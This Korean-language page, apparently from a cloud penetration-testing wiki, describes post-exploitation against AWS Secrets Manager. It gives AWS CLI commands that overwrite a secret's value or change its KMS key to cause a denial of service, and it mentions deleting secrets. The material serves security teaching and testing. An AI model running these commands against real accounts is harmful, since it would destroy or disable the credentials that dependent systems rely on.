AWS - Secrets Manager Post Exploitation
Secrets Manager
자세한 정보는 확인하세요:
pageAWS - Secrets Manager EnumSecrets 읽기
Secrets 자체는 민감한 정보이며, 특권 상승 페이지를 확인하여 어떻게 읽는지 배우세요.
DoS 변경 비밀 값
비밀 값을 변경하면 해당 값에 의존하는 시스템 전체를 DoS할 수 있습니다.
이전 값도 저장되므로 이전 값으로 쉽게 되돌아갈 수 있습니다.
```bash # Requires permission secretsmanager:PutSecretValue aws secretsmanager put-secret-value \ --secret-id MyTestSecret \ --secret-string "{\"user\":\"diegor\",\"password\":\"EXAMPLE-PASSWORD\"}" ``` ### DoS KMS 키 변경 ```bash aws secretsmanager update-secret \ --secret-id MyTestSecret \ --kms-key-id arn:aws:kms:us-west-2:123456789012:key/EXAMPLE1-90ab-cdef-fedc-ba987EXAMPLE ``` ### DoS 시크릿 삭제
시크릿을 삭제하는 최소 일 수는 7일입니다.
最終更新